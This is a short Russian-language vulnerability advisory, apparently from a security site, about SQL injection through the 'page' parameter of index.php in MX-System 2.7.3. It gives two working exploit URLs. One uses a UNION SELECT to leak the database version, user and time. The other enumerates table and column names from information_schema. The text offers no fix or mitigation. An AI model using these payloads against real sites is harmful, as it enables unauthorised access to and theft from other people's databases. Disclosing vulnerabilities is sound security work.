Программа: MX-System 2.7.3

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре «page»
сценарием index.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Эксплоит:

http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat_ws(char(58),version(),user(),now())/*

http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat(table_name,
char(58),column_name) +from+information_schema.columns/*

Оставить мнение